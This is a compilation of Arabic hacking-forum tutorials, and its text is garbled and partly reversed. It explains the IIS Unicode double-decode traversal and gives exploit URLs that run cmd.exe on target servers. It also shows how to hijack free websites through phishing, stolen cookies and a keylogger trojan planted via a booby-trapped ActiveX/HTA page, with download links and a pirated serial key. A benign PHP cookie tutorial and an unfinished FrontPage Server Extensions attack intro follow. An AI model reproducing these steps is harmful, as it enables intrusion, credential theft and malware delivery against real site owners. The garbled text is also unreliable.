يشغل :: بأن للهاكر تسمح ثغره عن عباره هى كود اليونى ثغرهبها مسموح بصالحيه بالقوه ( اوامر امتياز له يكون اى
IUSR_machinename account (
ال روتين ان نتيجه اصال الثغره هذه تحدث الويب cgi و على الموجودبال نسميه ما هذا و مرتين الموقع عنوان شفره يفك نفسه سرفر
DeCode ) ذلك بعد ستفهم تقلق ) ال
دى فوق كاتبها انا الى الخرابيط ايه اوضحلك خلينى معى تعالى
مثال ليكن :: وhttp://iisserver/scripts/..%5c..%...md.exe?/c+dir+c ===< يونى ثغره
كود
http://iisserver/ ====< المصاب الموقع اى هدفنا هو هذا سيكونالمذكروه بالثغره
* /scripts/ - ( اى السرفر على تنفيذيه امتيازات لديه الفولدر هذا و
وهذا ( خالله من الوبسرفر على امر اى تنفيذ لليوزر يمكنسكربتسال تنفيذ فى المستخدم هو ايضا الموجوده cgi الفولدر
التنفيذى الفولدر يسمى الفولدر هذا بالتحديد و سرفر الوب على) executable directory اى
يمكن لكن و مثال فقط هذا ثابت اسم ليسله الفولدر هذا طبعا والملقم على كثيره اسماء له يكون :: iis ان يوجد ال هامه ملحوظه و
ملقم كل اى iis على الفولدرالتنفيذى executable directory هذا
اسامى معظم ذكرو هكسقد االخ و هنتر بالك الصديق ان اعتقد وبعض ) الدروسمع اربط ان اريد فأنا شرحهم فى الديريكتورز هذه
متكامله ( سلسله تكون حتى
* winnt/system32/cmd.exe ===< ال هو هذا طبعا يسمح cmd و الذىتنفيذها نريد التى االوامر سطور بأدراج ( لنا ممكن فكره على و
ال هذا مثل cmd تستعمل اوامر استخدام و netstat و ping فىtraceroute .... بعضنا يالحظها لم فكره انها اعتقد ) الخ
الثغره- * هذه فى االستفهام عالمه حتى تخيلو االستفهام عالمه ؟مش ) طبعا االمر بها ينفذ التى الحاله تعنى العالمه فهذه دور لها
عالمه ( ايه يعنى افهمك معى تعالى يهمك ال و ايه يعنى فاهمكلمه تعنى الحاله argument االستفهام تعنى التى هى الكلمه هذه ومثل ينتهى ثم لحظه فى ينفذ مثال امر انه اى االمر بها سينفذ التى
copy ان حقيقه و مفعوله يستمر لكن و ينفذ مثال امر انه ام مثالمن هى و العاديه االوامر هى نستخدمها التى االوامر معظم طبعاال argument /c نوع هذا ثم c/ و لحظه فى ينفذ االمر ان يعنى
ينتهىويندوز :: عندك لو اكثر افهمك ال 2000تعالى افتح cmd و بتاعك
هذا لكنى , )?/ cmd( اكتب و جداا كثير كالم لك سيظهر انتر اضغط والباقى عليك انت و للتوضيح فقط بسيط جزء منه اخترت
لك يظهر راح الى ايه :: شوفStarts a new instance of the Windows 2000 command interpreter
CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
[[/S] [/C | /K] string]/C Carries out the command specified by string and then
terminates/K Carries out the command specified by string but remains/S Modifies the treatment of string after /C or /K )see below(
/Q Turns echo off/D Disable execution of AutoRun commands from registry )see
below(
هذا نشوف تعالى لكن و لك يظهر راح مما جداا بسيط جزء هذايقولك اوال معناه ايه :: الجزء
Starts a new instance of the Windows 2000 command interpreter و ويندوز ال مترجم من جديده حاله بدايه بالعربيه تعنى الجمله هذه
كل 2000 ان لنا وضح طبعا هذا و cmd فى صاحبه يتخكم ان يمكنال يغلق او يفتح ما حسب لنا . argumentsحالته يظهر بعدها و
arguments هو و الثغره فى دائما نستعمله الذى منها و c/ كثيرهامامه المكتوب ما كده :: شوفو
Carries out the command specified by string and then terminates ثم االوامر سطر فى الموجود االمر ينفذ انه معناه الكالم هذا و
نعرفها التى العاديه لالوامر هذا طبعا و ينتهىعن :: يتكلم انه نجد سوف تحتيه الى السطر نشوف argument تعالوال هو و كود اليونى ثغره فى نراه امامه k/ ال مكتوب ايه ::شوفو
Carries out the command specified by string but remains طبعا ومفعولها يستمر لكن و السطر فى الموجوده االوامر ينفذ انه معناه
) و امامى مكتوب هو ما هذا لكن و هذه مثل اوامر عن ابحث زلت مامثل حبتين طويله فتره تأخذ التى االوامر انها تقول تقدر ping لكن
) مثالهناك مثال مثل argument و تفعيل Q/ أخر اغالق فى نستخدمه هذا و
فوق echo امر المثال فى واضح هو كماال هذه من الكثير هناك ال arguments و اساسى هو ما منها طبعا و
فيه التحكم ( يمكنك ال مثل غلقه او فتحه ال c/ يعنى هناك ) k/ و وتجعلهم ان يمكنك ال off او on اخرين بحاله تتحكم انت تكون بهذا و
cmd ( تالقى راح النك المكتوب تقرأ و االمر تنفذ ياريت خاصتكانتهى ( حتى قليال على اصبروا و بالتفصيل الغلق و الفتح تفاصيلفى االول االمتحان الله MCSE من شاء ان اسبوعين خالل فى
بالتفصيل النقطه هذه لكم نشرح و قوه اكثر نعود ذلك بعد و تعالىشوى بساصبرو الله شاء ان
ال هى ما فهمت االن انك فائده arguments اعتقد ما التى c/ ومعناها تعرف ال انك متأكد انا و الثغره فى . تكتبها
ال , تشغل انت الثغره فى جدااا بسيطه و سهله لنقطه نروح تعالوcmd.exe لكن و و الخ االندكسو تغير و بالموقع تتحكم ان تريد النك
؟ نشغله كيف ياترى تانى ملف اى نشغل مثال تعالىالفايل :: اسم بوضع تقوم ان هو فعله عليك ما كل كيف اقلك راح اناالشكل بهذا تشغيله تريد من Ping.exe+PRINT الذى cmd.exe?/c بال
تريده الذى الفايل شغلت قد تكون بهذا و)enjoy this ( . الشكل بهذا الثغره تصبح :: حيث
http://issserver/scripts/..%5c..%.../ping.exe+PRINT
* /c+ - انا فوق عرفنا كما بالتالى ال c/ و cmd.exeلل argument هىال عليها سينفذ التى الحاله بجانب + cmd او التى ال عالمه اما االمر
يمكننا c/ ال ال لكن و الثغره فى الكلمتين بين المسافه بمقام فهىسطر يحمله الذى االمر يكون بعدها و عاديه بمسافه اسبدالها
تعرض + الذى الدرايف اسم بعدها و ثانيه عالمه ثم لينفده االوامرحاليا الشاشه على . محتوياته
** كما الثغره سبب اساسا هى و الثغره فى نقطه الهم االن نأتى والعنوان ) شفره حل يكون الثغره سبب ان هو الكالم اول فى ذكرنا
ال ( عليه نطلق ما هذا و مره من افصل decodeاكثر شخصيا انا والرياضيات فى كما الحل البسط نصل حتى تحليل انه على الديكودز
هذا simplyfiey يعنى نفهمكم خلينا تعالو المعادله فك و تبسيط اىنفسها الثغره :: على
/..%255c..%255c لالصل التحليل اى الديكود هو ..../ هذا؟ الغريبه التحليالت بهذه نفعله ان نحاول الذى ما ولكن
و الديريكتورز مسارات فى نلعب و نحسن ان نحاول بذلك فنحن
ال الن الديريكتورز فى اللعب او تغيير يمكنك ال لالسف iis لكنعمل بخاصيه من check مزود منعها و الديكودز هذه مثل على
او لمرتين التحليل هو و كود اليونى ثغره اصل يقع هنا و التنفيذال ان اى االن قصدى فهمتم مره من ال iisالكثر بخاصيه فعال مزودcheck من اكثر بها و الثغره تضع انت لكن و الديكودز هذه على
ال يقوم لذلك و الموقع لنفساسم واحد بوظيفته iis تحليلال هى و ان check المعتاده له يظهر و االول الديكود على المنع و
لكن و الموقفخخخخخخخخ على يسيطر انه و بخير شئ كلال يعمل انه الديكود checkالحقسقه ان النتيجه فتكون واحده مره
يكون بالتالى و الديريكتورز فى اللعب محاوله فى تماما ينجح الثانىاى اصله الى يرجع ان هو الثانى الديكود ) slash( / نتيجه
عرفنا ان بعد للثغره الديكود تفاصيل فى اكثر نتعمق و ندخل تعالو و:: فكرتها
اسمها ماده فيه درسفيها computer logic شوفو راح دى الماده ويسمى ال HexaDecimal Values شئ هذه اساس values و هى
مثل / حركه او حرفصحيح كل ان اى الثغره فى نفعله الذى الديكودبال يسمى ما لها الكمبيوتر اكثر hex value فى اوضحلك :: تعالى
مسافه 20مثال: % تعنى )space(جدول يوجد طبعا و كالمى االن فهمت انك اعتقد و بسيط مثال هذا
ال فى hex values لهذه العاديه الحركات و للحروف المساويهترسل , انك االن تماما ادركت انك اعتقد اذن hex values الكمبيوتر
ما بالضبط هذا و السرفر الى العاديه الحركات و الحروف عن عوضاال او الشفره فك او التحليل decodeنسميه
نشرح التى الحركه سنأخذ و اكثر الثغره تفاصيل نخشفى تعالىال هى هذه ) slash( / عليها فى الديكود اساسيات من انها حيث
:: الثغرهال جدول فى ال / = % hex value شوف ان نجد 5راح c , هو هذا طبعا
منها / بدال تضع و ال تحذف انك فى االن ستفكر الذى االول الديكودال هو valueهذا هذا الن خطأ هذا لك اقول انا لكن و الثغره فتنجح
اكثر ممكن او مرتين يحدث الديكود ان ذكرت انا و االول الديقودال ان فستجد االول الديكود هذا وضعت لو القدره iis يعنى لديهان علينا لذلك و التنفيذ من يمكنعه و الديكود هذا يمسك ان على
ال هذا الثغره value نحلل فتنجح التانى الديكود يتم حتى
ال جدول الى بالنظر هذا hexadecimal values و نجد :: شوف% = %255 = %35c = %63
ال خدعنا قد انفسنا نجد بالتالى شفره iis checker و ال حللنا بأننابالتالى / و هو و االصل على المقابل فى فسنحصل بالتالى و مرتين
الثغره نجحت قد . تكون
اساس فهمتم و مرتين العنوان ديكود معنى شباب االن فهمتمو مرتين االول التحليل تكرار ليسمعناه مرتين الديكود و الثغره
اى االول التحليل فك و تحليل معناه و simplify لكن ابسط الىنفسالوقت فى ممكنه صوره اطول
للتحليل الصح التركيبه كيف احطلك راح معك اكثر توضح عشان :: و%255c %25 = % 5 = 5 c = c = %5c
%%35c % = % %35 = 5 c = c = %5c%%35%63 % = % %35 = 5 %63 = c = %5c
%25%35%63 %25 = % %35 = 5 %63 = c = %5c
5ثم : % c =/
هو و االصل الديكود يساوى ان يجب االخر فى طبعا التحليل ارائيتمتساوى % التحليالت كل مثالنا فى واضح 5كما c % ذكرنا كما 5و c = /
ال نخدع حتى تحليل ابسط و اطول الى الرمز هذا حللنا لكننا iis وchecker .
بعض مع نطبقها تعالو هيا اساسها و للثغره فهمنا بعد النهايه فى والشكل هذا فى الثغره نضع :: سوف
http://iisserver/scripts/..%5c..%...xe?/c+dir+c:+/s
قد جديد شئ تالحظون اكيد لكن و بنجاح الموقع على ستدخلون وهو الشى هذا و الثغره على s/+ زاد
الرمز هذاالسابقسوف المثال فى كما الثغره مع الرمز هذا تدمج عندما و
الويبسرفر كمبيوتر فى صغير و كبير فايل بكل لسته تأتيك
تجميعها و المعلومات قرائه فى تعبت الدرسو هذا فى تعبت الله وانتظرو الله شاء ان و االخوه الشكل لهذا اصل حتى كود اليونى عن
فى االول امتحانى انهيت اكون بعدما القادم ( MCSE موضوعىبالنجاح شبكات ) ادعولى مع للتعامل تلخيص عن عباره سيكون و
ال 2000ويندوز فائده و اختراقها كيفيه و WIN2000 RESOURCE KIT.
،،،انتهى
اليونيكود " بواسطة اإلختراق عملية على " تدريب> ماكسهاك: > الكاتب
الرحيم الرحمن الله ..بسمعن شرح عندي واليوم بأنواعه المواقع إختراق عن الكالم كثركيفية على عملي تطبيق باألصح أو اليونيكود طريق عن اإلختراق
الذي وهو للمبتدئين يعتبر النوع وهذا اليونيكود طريق عن اإلختراقاإلحتراف طريق إلى سيوصلهم الله ..... بإذن
******************نبدأ الله ...بسم
وتقوم السيرفر أو الموقع مثل وهو جهازك على التطبيق سيكونمصاب موقع على وأنك الدرسكما .....بتطبيق
ويندوز نظام بتركيب قم المواقع إختراق على تتدرب على 2000لكي سيرفر . بإضافة تقوم النظام تبع نفسالسيدي وفي IIS جهازك
طريق عن : وذلكالتحكم *1 لوحة إلى بالذهاب .قم
برامج *2 إزالة إضافة على بالنقر .قمويندوز " *3 مكونات إزالة إضافة زر على بالنقر ." قم
األول *4 الخيار على صح عالمة بوضع .”IIS“ قمالسيرفر تنزيل لكيفية بالنسبة ..هذا
: ـ بالتالي فقم اختراقه أي الجهاز على التدرب كيفية عن امامجلد في الموقع بوضع wwwroot قم مجلد داخل Inetpub الموجود
السيرفر تشغل ما بعد عليه هتدخل طريق IIS طبعا عنhttp://127.0.01/
عمران برنامج بتشغيل قم عليها والتدرب الجهاز في الثغرة وإليجادوقم اليونيكود تبع الثغرات للفحصعن اخر برنامج أي أو سكان
هو الي تبعك العنوان /http://127.0.0.1 بوضعالمصابة المواقع اختراق في تعلمتها التي المهارات بتطبيق وقم
.باليونيكود،،،انتهى
المجانية " المواقع اختراق لكيفية مفصل " شرح> إعصار منتدى من >منقول
>De\/iL Ni9hT :الكاتب<-= المجانيه المواقع اختراق -=سهوله
مماتتصور,,, اسهل اختراقها ان نعم
جميع على يحتوي النه الكوكيز هو شي كل الختراق االساسيات)) ,, ,, الخ)) ايميل الموقع المعلومات
مجاني موقع اي الختراق مهمه نقاط عده تعرف ان يجب ولكن
-=اوال
المتصفح اصدار نوعيه معرفه عليك يجب
-=ثانيا
.. وتستطيع الخ االيميل مثل الموقع صاحب بيانات بعض معرفه عليكببعضالطرق له -=التوصل
-=ثالثا
المتصفح من الكوكيز لسرقه االزمه االكواد ايجاد اوال -=عليك
الشرح لنــبدأ
سهله الموقع لصاحب المتصفح اصدار نوعيه لمعرفه االولى النقطهالخاصبصاحبه المتصفح نوعيه علىحسب يصمم موقع فكل جدا
ويعطيك معينه بدقه تصفحه يفضل الموقع نهايه في لنا ويكت
= المناسب الموقع لتصفح المناسب االكسبلور اصدارشئ= واهم نقطه اسهل بهوهذه الخاص نفساالصدار لتصميمه
المجانيه المواقع الختراق فيها
يكون ان ويجب طرق عده فهناك الضحيه الى للوصول بالنسبه واما (( هنا ساضعها الكوكيز بسرقه الخاصه الهتمل اكواد معاكصفحه(( في تضعها االكواد هذه على حصلت بعدما واالن الحقا
طرق عده وهناك لها للتوجه الضحيه جذب وتحاول
1- وضعه اذا الموقع في مكان اي من ايميله او ماسنجر عنوان تاخذ)) (( وتعطيه مصلحه حب هههههههه عنده موثوق وتصير وتحبهملفسارق له ترسل او الكوكيز فيها حطيت الى صفحتك
الباسوورد
2- للموقع المجانيه االستضافه مقدمه الى الشركه نوعيه تحدد مثالالموقع عنوان كان اذا /http://www.name.8m.com فمثال
سيرفر فري شركه من مقدم الموقع ان معناه FreeServerS فهذاالمجانيه المواقع الى بالدخول المحدده النطاق معرفه وتستطيع
(( المتاحه الدوامين انواع لك وستظهر تسجيل 8وعمل m.s5....الخ
خاص تصميم لهم ويكون البيانات لك وسيرسلون عندهم وتسجل(( طبعا الرساله محتوى وتغيير نفسالتصميم بسرقه عليك وانت جدا
(( الى(( موقعك موقع فتح منه تتطلب منه رساله وارسال بالعنقليزي )) رأى اذا يشك لن اخروهو شئ اواي التحديثات لعمل مثال الكود فيه
وسيفتح الشركه موقع نفسطريقه وطريقتك رسالتك تصميمحاال الموقع
الزوار سجل تدخل مثال انك وهى طريقه فهناك ايميله يضع لم واذاتصميم له تقول مثال يعني بقوه يجذبه و يقهره عندهوتكتبشي
(( للمره وهو اللنك وتعطيه الموقع هذا من حرفيا مسروق موقعك )) من اخرى طريقه اي او الكود فيه الى الموقع اقلكم المليون
الموقع اختراق عليك فهناك زوار سجل او ايميله تجد لم ذكائكواذاجدا جدا صعب وهو بالثغرات
الكوكيز وهي الثالثه -=النقطه
معاه مرفق تاني موضوع في بحطشرحه كدا عشان شرحها يطولكوكيز لسرقه معها التعامل طريقه مع بالمتصفحات الخاصه االكواد
جهازك الى وتوصيله الضحيه
متصفح لديهم اصحابها التى المجانيه المواقع اختراق IE 5 IEطريقه5.5
صاحب الى الوصول استطعت اذا تستعملها التى الطريقه هي هذه))" المجانيه )) " المواقع اختراق سهوله درس راجع الموقع
على وسنعتمد الباسوورد سرقه في الكوكيز على نعتمد لن اوالالكيبوردواليكشفه في شي كل يسجل وخطير قوي تروجان
اول ملغومه صفحه في سنضعه الذي فايروسوهو انتي النورتونجهازه الى ينزل الضحيه ,,,,مايفتحها
برنامج بتحميل قم keykey2000 اوال كلشي يسجل البرنامج وهذاوانا االيميل على ويرسلها بها تعمل كنت الى واالشياء بالكيبورد
العمليات اللغاء الثالثه واالزرار الجديد النورتون واليستطيع مجربهووصلته ايقافه النظام في النشطه
http://www.mikkotech.com/kk2000pro.exe
نمبر والسيريال
SN: K100-43-109-0-793218E876A4C9-29
كلمونيواالن شرحه اردتم واذا لشرح يحتاج وال جدا سهل والبرنامجبرنامج بتحميل قم البرنامج الباتشبهذا ملف جهزت godwillبعدما
اكسبلور انترنت على الموقع الخاصاللغام البرنامج و 5وهو 5.5)) ووصلته)) المهنه سر هي هذه
http://www.thecorpz.org/activex/gwpackage.zip
=====================الشــــرح====================
سهل النه للبرنامج بسيط شرح وهذا بالصور شرح بعمل اقوم لن انا جدا
منها اختار لوحه لك ستظهر البرنامج تفتح عندما
enter منها يهمنا والذى القائمه لك وستظهر االسفل في
Upx)) (( موضوعنا عن خرجنا اظننا الباتش لتشفير وهذا
Html نضغط وعندما ملغومه صفحه بعمل نقوم لكي هنا شغلنا وكلمنها اختار وانت اختيارات عده تجي عليه
General options وهذا الملغومه الصفحات عرض مربع لك وستظهرلها سريع شرح
enter exe file حجمه يكون اال بشرط سويته الباتشالى تضع هنا ومن)) (( فيشئ المعلومه هذه تفيدنا هل جدا كبير
enter html صح عالمه وحط الغامها ثم جهازك من الستعراضصفحه
use default page جانب جديده صفحه بعمل البرنامج ليقوم
االسفل HTA File Nameوفي االنتهاء وبعد الصفحه اسم تضع وهناكلمه نختار ذلك Done من (( وسيكون الصفحه بعمل البرنامج ليقوم
)) البرنامج نفسمجلد في مكانها
واضحا الشرح يكون ان وارجو
الموقع هذا الى توجه البرنامج مع مشكله واجهت واذا
http://www.thecorpz.org/html/activesploits.html
=================== الشـــرح ====================نهايه
للضحيه واعطائها النت في الملغومه الصفحه بوضع تقوم وبعدماجهازهعندما على التروجان سينزل سابقا شرحتها التى بالطرق
بريدك في تنتظر انت االن لك يبقى ولم الملغوم موقعك بفتح يقوم(( الموقع مثل الضحيه عن المعلومات التروجان في حطيته الى
)) االشتراكات,, لسرقه ايضا تنفع الطريقه وهذه الخ وااليميلوايميله المنتديات في .واساميه
،،،انتهى
الكوكيز " عن " درسمفصل> فلسطين هاكرز منتديات من >منقول
>Linux Girl :الكاتب<مقدمة
الكعكات مواقع ) s****** الـ ( تعد انشاء في المفيدة الوسائل منالمتصفح قام هل معرفة من ستتمكن فبواسطتها ، تفاعلية اكثر
ال ام قبل من موقعك .. بزيارة
استخدامها يمكننا كيف و الكعكات على الدرسسنتعرف هذا ... في
الدرس : اقسامعامة -1 . معلومات
العميل -2 جهاز على الكعكات . زراعةالعميل -3 جهاز من الكعكات . قراءةالخلفية : -4 لون تخصيص . تطبيق
عامة معلومات
؟ - الكوكيز ملفات هي ماتزورها التي المواقع تقوم ، نصية ملفات عن عبارة الكوكيز ملفات
الملفات هذه وتحتوي ، جهازك في الصلب القرص على بإيداعهاعند يسترجعها أن أودعها الذي للموقع تتيح معلومات على النصية
للموقع المقبلة زيارتك عند أي ، . الحاجة
موقع من الكوكيز ملفات ضمن تخزن التي المعلومات وتختلفمعلومات أي استرجاع المواقع هذه ليسبإمكان ولكن ، آلخر
في المخزنة المعلومات تلك باستثناء ، جهازك عن أو عنك إضافية ، الموقع قبل من إرسالها تم والتي ، بها الخاص النصي الملف
الكوكيز ملفات مضمون على االطالع المواقع هذه تستطيع ال وبذلكجهازك على خاصة ملفات أي أو ، . األخرى
؟ - جهازك على الكوكيز ملفات إيداع يتم كيف ، العناوين شريط في موقع عنوان إدخالك عند ، المتصفح يرسل
عنوان متضمنا ، حددته الذي الموقع إلى ونوع IP طلبا ، به الخاصتخزن . جهازك يدير الذي التشغيل ونظام ، تستخدمه الذي المتصفح
بالمزود خاصة ملفات في المعلومات ، Log Files هذه عالقة واليبحث . ذاته الوقت وفي إرسالها يتم التي بالمعلومات للكوكيز
فإذا ، المطلوب الموقع تخص التي ، كوكيز ملفات عن المتصفحفإن ، توجد لم وإذا ، الموقع مشاهدة طلب مع إرسالها يتم وجدها
ملفات بإرسال فيقوم ، إليه األولى زيارتك هذه أن سيدرك الموقععليه لتخزن جهازك إلى . الكوكيز
أو الكوكيز ملفات ضمن الموجودة المعلومات تغيير الموقع وبإمكانبعض . تخزين يتم الموقع بزيارة قمت كلما جديدة معلومات إضافة
عند مباشرة حذفها يجري بحيث ، فقط الذاكرة في الكوكيز ملفاتالكوكيز " ملفات وتسمى معظمها ولكن ، المتصفح إغالقك
لحين" الصلب القرص على محددة لفترة تخزينها يتم ، المثابرةأما . سنوات حتى أو أشهر مدة صالحيتها تدوم وقد صالحيتها انتهاء
فإنها ، سابق لتاريخ صالحية تاريخ تعرض التي الكوكيز بعضملفاتالمعلومات . وتعود الصلب قرصك على ن تخز وال مباشرة تحذف
فقط أصدرها الذي الموقع مزودات إلى الكوكيز ملفات في المخزنةتصدرها التي الكوكيز ملفات الكبرى بعضالشركات تعمم وقد ،
تصدر ال ولكي ، المتضمنة المعلومات لتنسيق ، مزوداتها جميع علىزيارته عند ، ذاته للمستخدم كوكيز ملفات مزوداتها من كل
الموقع في مختلفة . لصفحات
الكوكيز - ملف : مكوناتانتهاء تاريخ ، قيمته ، الملف اسم هي اجزاء عدة من عادة يتكون
له المالك الموقع ، ... مفعوله
العميل جهاز على الكعكات زراعة
الكعكات : ملفات تزرع كيف : أوالالدالة باستخدام ذلك التالي ******set يتم بالشكل تعريفها : و
code:________________________________________
boolean set****** ) string name [, string value [, int expire
[, string path [, string domain [, int secure]]]]](
________________________________________
هي و االولى الثالث المدخالت : تهمناname : ... الى كعكة من اكثر ارسال فبامكانك الكعكة اسم اي
للتمييز الوحيدة الطريقة هو االسم يصبح عندها و واحد . متصفح
value : ... ... كقيمة مصفوفة وضع يمكنك ال نصية قيم فقط القيمةبطريقة ... لكن مصفوفة وضع بامكانك انتبه لكن مهم أامر هذا و
الدالة ... : استخدم ؟ كيف ؟ بي serialize اخرى في متغير اي لتحويلاستخدم ثم من و نصي شكل الى الى unserialize اتشبي العادته
الطبيعي . الشكل
expire : ( اليونكس عصر بدية من الثواني عدد و ( 1970يناير 1اي الكعكة ... بحذف المستخدم جهاز على المتصفح سيقوم بعدها التي
حاالت ثالث هنا : والحالي : >-- الوقت من اكثر كمدخل المعطى الوقت يكون أن أوال
تحذف و العميل جهاز على الكعكة تخزن عندها و العميل جهاز علىالمدة انقضاء . عند
على : >-- الوقت من اقل كمدخل المعطى الوقت يكون أن ثانيابتخزينها العميل جهاز على المتصفح يقوم ال عندها و العميل جهاز
المدة تنتهي لم لو حتى يحذفها فانه بنفساالسم كعكة وجدت اذا و.
و : >-- المتصفح ذاكرة في تخزن الكعكة فان وقتا تحدد لم إذا ثالثاالموقع المستخدم يغلق حالما . تفقد
: مثالcode:
________________________________________>?
set******)'site','http://www.palhackerz.com/',time)(+3600(;
?< ________________________________________
دالة المفيدة الدوال شكل time من على الحالي الوقت ترجع التي واليونكس ) عصر بداية من الثواني (1970يناير 1عدد .
كعكة تعدل او تحذف كيف :ثانياالقيمة خالية و بنفساالسم كعكة ترسل أن عليك كعكة تحذف لكي
المستخدم جهاز على الوقت من اقل وقت ذات و
: مثالcode:
________________________________________>?
set******)'site','',time)(-360000(;
?< ________________________________________
: مالحظاتفارق -1 تتفادى لكي كبيرة قيمة اجعله ماضيا زمنا تحدد عندما
العميل و الخادم بين . التوقيتجديد -2 من إرسالها و حذفها عليك كعكة أي تعدل . لكي
مهمة : مالحظةالدالة تستدعي ان الى ******set يجب شيء اي ترسل أن قبل
ينجح .. لن التالي الكود فمثال : المتصفحcode:
________________________________________>html<
>body<
>?
set******)'site','palhackerz.com',time)(+20000(;
echo " Alfjr.com : the best islamic forum";
?<
>/body<
>/html<
________________________________________
تعمل ?< فلن البداية عالمة قبل فارغ سطر مجرد هنالك كان لو بل... ******set الدالة
يكون ان الممكن من كان السابق : المثالcode:
________________________________________>? set******)'site','palhackerz.com',time)(+20000(;
?<
>html<
>body<
>? echo " palhackerz.com : the best Hacking forum"; ?<
>/body<
>/html<
________________________________________
العميل جهاز من الكعكات قراءة
الكعكة - من المتغيرات تستقبل : كيفواحد متصفح الى كعكة من اكثر ارسال بامكانك بانه قلنا .. كمافان موقعك على صفحة متصفحه من المستخدم يطلب عندما
عند بزراعتها انت قمت التي الكعكات جميع بارسال يقوم المتصفحفي PHP ... المستخدم تخزنها و الكعكات هذه قراءة عليك تسهل
النوع ******_$ من مصفوفة هي و اسمها Associative مصفوفةArrays كما الكعكة قيمة القيمة و الكعكة اسم هو المفتاح ان بحيث
. ارسلتها
: مثالcode:
________________________________________>?
echo $_******['site'];
?< ________________________________________
تطبع هذه : وcode:
________________________________________palhackerz.com
________________________________________الخلفية : لون تخصيص تطبيق
الكعكات نستخدم و مبسط موقع بانشاء نقوم دعنا بسيط كمثالالشخص الى المحببة الخلفية لون نحفظ .. لكي
؟ - لدينا ماذابعمليتين : user.php الملف -1 الملف : يقومالزائر : >-- اختاره الذي اللون تحديد . االولى
المختار : >-- اللون حفظ و الللون اختيار نموذج عرض الثانية
من index.php الملف -2 تستفيد التي و الموقع صفحات إحدىالملف . user.php خدمات
ملف الخاصبكل الكود : وإليك: user.php الملف -1
code:________________________________________
>?
/*-----------------------
******s-Based Background Selector..
Created By : "Rasha">[email protected]<
For : h4palestine.com
-------------------------*/
function display_form)({
?<
>html<
>body<
>!-- Color setting Form --<
>form name=color_select method="GET"<
>INPUT type="hidden" name="do" value="set_color"<
>INPUT name="color" type="text" value="
>? echo get_color)(; ?<"<
>INPUT type="submit" value=" اللون >"احفظ
>/FORM<
>!-- Color Clearing Form --<
>form name=color_clear method="GET"<
>INPUT type="hidden" name="do" value="clear_color"<
>INPUT type="submit" value=" المفضل لوني تتذكر >"ال
>/FORM<
>?
}
function set_color)({
global $_GET;
set******)'color',$_GET['color'],time)(+36000(;
header)'Location:index.php'(;
}
function get_color)({
global $_******;
if)isset)$_******['color'](({
return $_******['color'];
}else{
return "#FFFFFF";
}
}
function clear_color)({
set******)'color',$_GET['color'],time)(-36000(;
header)'Location:index.php'(;
}
// selection
if )$do=='display_form'({
display_form)(;
}elseif )$do=="set_color"({
set_color)(;
}elseif )$do=="clear_color"({
clear_color)(;
}
?<________________________________________
االولى - اللون display_form الدالة اختيار نموذج بعرض فقط . تقومالثانية - و set_color الدالة كعكة في المختار اللون بحفظ تقوم
الرئيسية الصفحة الى المستخدم . ترجعالثالثة - يكن get_color الدالة لم اذا و الكعكة من اللون قيمة ترجع
االبيض وهو افتراضي لون ترجع فانها قيمة . هنالكالرابعة - التي clear_color الدالة بالطريقة الكعكة بمسح تقوم
الدرس في . ذكرناها
الـ -2 : index.php ملفالدالة يطلب انه اال جدا عادي ملف get_color ملف كما user.php من
: يليcode:
________________________________________>html<
>BODY bgcolor=">? include)'user.php'(;
echo get_color)( ?<"<
>h1< بك >h1/<..... مرحبا
>br<
هنا من الخلفية تخصيصلون يمكنك
>br<
>a href="user.php?do=display_form"< اللون تخصيص >a/<صفحة
>/body<
>/html<
________________________________________بيج ".20 الفرونت تدعم التي المواقع عن مهمة " معلومات
>منقول<>. ) T.O.L. ) DeXXa :الكاتب<
الدرس هذا قراءة قبل تعرفه أن يجب الذي : ما
باالنجليزية * . االلمامالـ * عن المزيد ليسكيفية FrontPage Server Extensions قراءة و
. اختراقهبرنامج * مع التعامل . Microsoft Office FrontPage كيفية
الـ * مع التعامل . CHMOD كيفيةالـ * مع التعامل . Telnet كيفية
بروتوكول * مع التعامل . HTTP كيفيةالعالئقية * البيانات قواعد مع التعامل . SQL كيفية
الخادم * بناحية تعمل التي و الويب لغات أحد مع التعامل كيفيةServer Side Scripting Language .
وظيفته انسان إال هو ما المخترق بأن اؤمن بأني أخيرا اذكر وهو همه ليسانسان و الشبكات و النظم تحليل و ادارة و البرمجة
القليل معرفةو اآلخرون به تعب بما العبث و التخريب في تساعده التي األمور من
لذا و ، االنترنت بمقاهي التسكع و الدردشة في الوقت تضييع فافترضبأن
لـ يحتاج ال و واضحا سيكون أقوله . Screen Capture ما
الموضوع @ : خريطة
؟ . الموضوع قراءة عند ستسفيده الذي ما مقدمة .
الـ . هو ؟ FrontPage Server Extensions ماالـ . عمل آلية هي ؟ FrontPage Extension Server ما
بـ . االتصال FrontPage Extension Server كيفيةالـ . يدعم الموقع هل معرفة ال FrontPage كيفية أم
فيصالحك . ليصبح استغالله كيفية
؟ @ للموضوع قراءتك عند ستستفيده الذي ما
الـ * هو ما . FrontPage Server Extensions ستعرف
عمله * . آليةموقع * بأي الخاصة المعلومات جمع . كيفية
به * الخاص بالخادم االتصال عند منه لالستفادة . بعضالطرق
: مقدمة @
، لعمالئها الراحة شبل شتى توفير بأنواعها التسكين شركات تسعىلـ دعم مثل العمالء الرضاء التخفيضات و العروض يقدمون فتجدهم
PHP و CGI و Perl و SSL و FTP و SQL .
المواقع لمدارء بالنسبة لهم Webmasters و المفضل البرنامج فإنهو مواقعهم هو Microsoft Office FrontPage لتصميم كما الذي و
يأتي مبينحزمة ، Office مع بعض يوفر انه كما استعماله بسهولة يتميز اذ
كامل دعم التسكين شركات تقدم لذا و ، الزوار عداد مثل البرمجيات . للبرنامج
الـ @ هو ؟ FrontPage Server Extensions ما
االصدار : ( حزمة بعد أتت التي الحزم عن حاليا سأتكلم مالحظة ) الثاني
الخادم في تثبيتها يتم البرامج من حزمة عن عبارة Server هوالخصائص بعض لدعم قالبية لها التي التسكين . الخاصبشركة
منها مجلدات عدة انشاء يجب التثبيت عند : و
/_private /_vti_bin /_vti_cnf /_vti_log /_vti_pvt /_vti_txt
يهمنا مجلد كل وظيفة عن سأتكلم : و
: vti_bin_ المجلد *
هما مجلدان بداخله يتواجد : و
المجلد : ( إلى تشيران النقطتان ) vti_bin_ مالحظة
../_vti_adm/ ../_vti_aut/
وال بالمشرف الخاص أنه اذ األول المجلد يهم ما بقدر يهمنا ال الثانيبه الخاصة المرور كلمة على تحصل لم اذا منه االستفادة . تستطيع
هما ملفان يوجد : كما
